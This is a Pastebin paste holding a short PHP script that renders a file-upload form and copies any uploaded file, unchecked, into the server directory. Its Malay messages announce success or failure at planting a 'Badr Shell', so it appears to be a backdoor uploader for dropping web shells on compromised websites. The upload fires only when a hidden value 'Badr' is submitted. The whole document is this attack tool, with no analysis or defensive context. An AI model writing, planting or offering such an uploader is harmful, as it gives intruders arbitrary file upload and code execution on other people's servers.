Advertisement
Guest User

Untitled

a guest
Mar 29th, 2020
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. <?php
  2. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  3. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  4. if( $_POST['_upl'] == "Badr" ) {
  5. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Badr Shell Korang!!!<b><br><br>'; }
  6. else { echo '<b>Korang Gagal Badr Shell Korang!!!</b><br><br>'; }
  7. }
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement